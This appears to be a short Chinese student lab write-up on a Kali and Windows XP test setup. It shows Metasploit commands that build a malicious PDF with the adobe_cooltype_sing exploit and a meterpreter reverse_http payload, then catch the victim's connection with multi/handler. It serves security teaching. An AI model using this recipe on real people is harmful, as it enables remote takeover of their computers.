20145322 Exp5 Adobe阅读器漏洞攻击
20145322 Exp5 Adobe阅读器漏洞攻击
实验过程
IP:kali:192.168.1.102 windowsxp :192.168.1.119
msfconsole进入控制台
使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块
设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http
使用命令show options来确定需要修改的参数。
使用命令exploit生成5333.pdf
退出并重新进入msf平台,使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。
把生成的5322.pdf移动到winxp里面,并打开
连接成功
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步